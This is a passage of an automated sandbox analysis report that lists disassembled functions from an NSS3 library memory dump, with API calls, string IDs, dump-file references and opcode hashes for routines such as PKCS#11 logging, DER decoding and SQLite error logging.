                                                                                • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CFCFCBD
                                                                                • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CFCFCCC
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CFCFCEF
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CFCFD32
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CFCFD46
                                                                                • PORT_Alloc_Util.NSS3(00000001), ref: 6CFCFD51
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CFCFD6D
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFCFD84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                • String ID: :
                                                                                • API String ID: 183580322-336475711
                                                                                • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                • Instruction ID: c7b97eb75fbd9fceeb59439410a0ef47291eb79fb07e8ddcab0d3b6134178f32
                                                                                • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                • Instruction Fuzzy Hash: B631DFB6F042169BEB418AA4EC45BAFB7A8AF54318F160135DE14E7600E772EA14C7D3
                                                                                Function 6CFE6C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_DigestInit), ref: 6CFE6C66
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE6C94
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE6CA3
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE6CB9
                                                                                • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CFE6CD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                • API String ID: 1003633598-3690128261
                                                                                • Opcode ID: 2e80b49addbe498cd9d7936a633f0044e6419d4668b1cfab9218a9a71dd15460
                                                                                • Instruction ID: ef2ba99f4ff44352cd76e4474d09b1005b16524187d5c10c8e0b8f4d6c9dd4c8
                                                                                • Opcode Fuzzy Hash: 2e80b49addbe498cd9d7936a633f0044e6419d4668b1cfab9218a9a71dd15460
                                                                                • Instruction Fuzzy Hash: 0221287190020CAFEB10DF5AEE4AB5E37B5EB4A319F454029F61D97642DBB09908C792
                                                                                Function 6CFE9DD0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_SessionCancel), ref: 6CFE9DF6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE9E24
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE9E33
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE9E49
                                                                                • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CFE9E65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                                                • API String ID: 1003633598-1678415578
                                                                                • Opcode ID: 9b609197b3d933d084df9a7f429b9995c3d8901b4ba245c3ce444ae2eee620fd
                                                                                • Instruction ID: 102e148a62dc7504840546d0dd5eaecfa3fdbb738b90f748dd6e4e791d235904
                                                                                • Opcode Fuzzy Hash: 9b609197b3d933d084df9a7f429b9995c3d8901b4ba245c3ce444ae2eee620fd
                                                                                • Instruction Fuzzy Hash: 8A210AB1901204AFE710DB55ED86BEE3775EB4A30DF054029EA19A7252DFB09A44C7B2
                                                                                Function 6CFB6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,6CFB7D8F,6CFB7D8F,?,?), ref: 6CFB6DC8
                                                                                  • Part of subcall function 6D00FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D00FE08
                                                                                  • Part of subcall function 6D00FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D00FE1D
                                                                                  • Part of subcall function 6D00FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D00FE62
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CFB7D8F,?,?), ref: 6CFB6DD5
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0D8FA0,00000000,?,?,?,?,6CFB7D8F,?,?), ref: 6CFB6DF7
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CFB6E35
                                                                                  • Part of subcall function 6D00FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D00FE29
                                                                                  • Part of subcall function 6D00FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D00FE3D
                                                                                  • Part of subcall function 6D00FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6D00FE6F
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CFB6E4C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01116E
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0D8FE0,00000000), ref: 6CFB6E82
                                                                                  • Part of subcall function 6CFB6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CFBB21D,00000000,00000000,6CFBB219,?,6CFB6BFB,00000000,?,00000000,00000000,?,?,?,6CFBB21D), ref: 6CFB6B01
                                                                                  • Part of subcall function 6CFB6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CFB6B8A
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CFB6F1E
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CFB6F35
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0D8FE0,00000000), ref: 6CFB6F6B
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,6CFB7D8F,?,?), ref: 6CFB6FE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 587344769-0
                                                                                • Opcode ID: 13456bcc61c491e32dbba9fa177ebaf46d62aa07442bda7204859262193e65b3
                                                                                • Instruction ID: 825fcf0350d18584a60703d3b0c93e574de490ffd501b465a3d05c3d76139301
                                                                                • Opcode Fuzzy Hash: 13456bcc61c491e32dbba9fa177ebaf46d62aa07442bda7204859262193e65b3
                                                                                • Instruction Fuzzy Hash: 49719271D142469FEB04CF56CD40BAA7BA8FF94348F15422AF918E7611F770EA94CB90
                                                                                Function 6CFFADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE10
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE24
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,6CFDD079,00000000,00000001), ref: 6CFFAE5A
                                                                                • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE6F
                                                                                • free.MOZGLUE(85145F8B,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAE7F
                                                                                • TlsGetValue.KERNEL32(?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEB1
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEC9
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAEF1
                                                                                • free.MOZGLUE(6CFDCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?), ref: 6CFFAF0B
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CFDCDBB,?,6CFDD079,00000000,00000001), ref: 6CFFAF30
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                • String ID:
                                                                                • API String ID: 161582014-0
                                                                                • Opcode ID: 9246496dac5f6947f5c63b824266a563b9b97f25cd76b4220afc14add428f8d2
                                                                                • Instruction ID: 671b80f70d087233540608477c8edf88e46f38891bc45186b866de505eb450b5
                                                                                • Opcode Fuzzy Hash: 9246496dac5f6947f5c63b824266a563b9b97f25cd76b4220afc14add428f8d2
                                                                                • Instruction Fuzzy Hash: C3519FB1900602EFEB00DF25D885B9AB7B4FF04318F144265DC299BA61E771F8A5CBE1
                                                                                Function 6CFD4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CFDAB7F,?,00000000,?), ref: 6CFD4CB4
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6CFDAB7F,?,00000000,?), ref: 6CFD4CC8
                                                                                • TlsGetValue.KERNEL32(?,6CFDAB7F,?,00000000,?), ref: 6CFD4CE0
                                                                                • EnterCriticalSection.KERNEL32(?,?,6CFDAB7F,?,00000000,?), ref: 6CFD4CF4
                                                                                • PL_HashTableLookup.NSS3(?,?,?,6CFDAB7F,?,00000000,?), ref: 6CFD4D03
                                                                                • PR_Unlock.NSS3(?,00000000,?), ref: 6CFD4D10
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • PR_Now.NSS3(?,00000000,?), ref: 6CFD4D26
                                                                                  • Part of subcall function 6D079DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DC6
                                                                                  • Part of subcall function 6D079DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D0C0A27), ref: 6D079DD1
                                                                                  • Part of subcall function 6D079DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D079DED
                                                                                • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CFD4D98
                                                                                • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CFD4DDA
                                                                                • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CFD4E02
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 4032354334-0
                                                                                • Opcode ID: 8539e5613deb90853761515eee11ba92c728ab1ab9e344f6b2bf96bc5b3fa46b
                                                                                • Instruction ID: c1326c7f2658ceed25549f9deb33f1cd2b4247086d3cecfcf35a71ae6bdde1b9
                                                                                • Opcode Fuzzy Hash: 8539e5613deb90853761515eee11ba92c728ab1ab9e344f6b2bf96bc5b3fa46b
                                                                                • Instruction Fuzzy Hash: B141A6B6A002059FEB019F24EC40B6B7BB8EF1525CF0A4170EC1987751EB31E964CBA2
                                                                                Function 6CF9FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_initialize.NSS3 ref: 6CF9FD18
                                                                                • sqlite3_initialize.NSS3 ref: 6CF9FD5F
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF9FD89
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6CF9FD99
                                                                                • sqlite3_free.NSS3(00000000), ref: 6CF9FE3C
                                                                                • sqlite3_free.NSS3(?), ref: 6CF9FEE3
                                                                                • sqlite3_free.NSS3(?), ref: 6CF9FEEE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                • String ID: simple
                                                                                • API String ID: 1130978851-3246079234
                                                                                • Opcode ID: be3654a46468e21531d1368d86c0c590bac33caf751a402b8d8b96fbac9061f1
                                                                                • Instruction ID: 3382a384e69c1034b5b6254537559898a910fb381d3b10d954f93651a4bf2453
                                                                                • Opcode Fuzzy Hash: be3654a46468e21531d1368d86c0c590bac33caf751a402b8d8b96fbac9061f1
                                                                                • Instruction Fuzzy Hash: 4D9190B1E012069FEF44DF55C880BAAB7B1FF85318F24C169E8199B762E731E941CB90
                                                                                Function 6CFA5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CFA5EC9
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CFA5EED
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CFA5ED1
                                                                                • unable to close due to unfinalized statements or unfinished backups, xrefs: 6CFA5E64
                                                                                • API call with %s database connection pointer, xrefs: 6CFA5EC3
                                                                                • %s at line %d of [%.10s], xrefs: 6CFA5EE0
                                                                                • invalid, xrefs: 6CFA5EBE
                                                                                • misuse, xrefs: 6CFA5EDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                • API String ID: 632333372-1982981357
                                                                                • Opcode ID: fff70fe921c310612599ed112618ab16168c03ab2fc489429e1803e52b6cb99e
                                                                                • Instruction ID: df3f804faf684574269620ba4831362c54ddaf04fa522aec20f9df6160e89f17
                                                                                • Opcode Fuzzy Hash: fff70fe921c310612599ed112618ab16168c03ab2fc489429e1803e52b6cb99e
                                                                                • Instruction Fuzzy Hash: A8819071B09E11DBEB19CFA5D888BAAF770BF45308F284259D8195BB51D730E843CB91
                                                                                Function 6CF8DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF8DDF9
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF8DE68
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF8DE97
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CF8DEB6
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF8DF78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 1526119172-598938438
                                                                                • Opcode ID: 7a7da7db314224c9ebfc0675bcf6e1057f3a97b2f9d2f338309e468aedd9c500
                                                                                • Instruction ID: 7ee9fabff1698ca1110b1fc04bdaf4065f017b6c40e1bd5b25139ec02b6f8599
                                                                                • Opcode Fuzzy Hash: 7a7da7db314224c9ebfc0675bcf6e1057f3a97b2f9d2f338309e468aedd9c500
                                                                                • Instruction Fuzzy Hash: 3E81D572605302AFD714DF25C880B6B77F1BF45308F15882EE99A8BB92E731E945CB52
                                                                                Function 6CFFCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,00000100,?), ref: 6CFFCD08
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6CFFCE16
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6CFFD079
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                • String ID:
                                                                                • API String ID: 1351604052-0
                                                                                • Opcode ID: 2e0ec1ee4b3260cb68c0820074381fb28b288985b51b7a67b67f90d631a84f01
                                                                                • Instruction ID: 91f8a6f492d94a6cb35b054be3cce2cfdf7c1a6b731d26579a2f1abdd746b4e7
                                                                                • Opcode Fuzzy Hash: 2e0ec1ee4b3260cb68c0820074381fb28b288985b51b7a67b67f90d631a84f01
                                                                                • Instruction Fuzzy Hash: 24C18FB19002199BEB20DF24CC80BDAB7B4FF48318F1541A8D968A7751E775EE96CF90
                                                                                Function 6CFEDC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CFF97C1,?,00000000,00000000,?,?,?,00000000,?,6CFD7F4A,00000000), ref: 6CFEDC68
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFEDD36
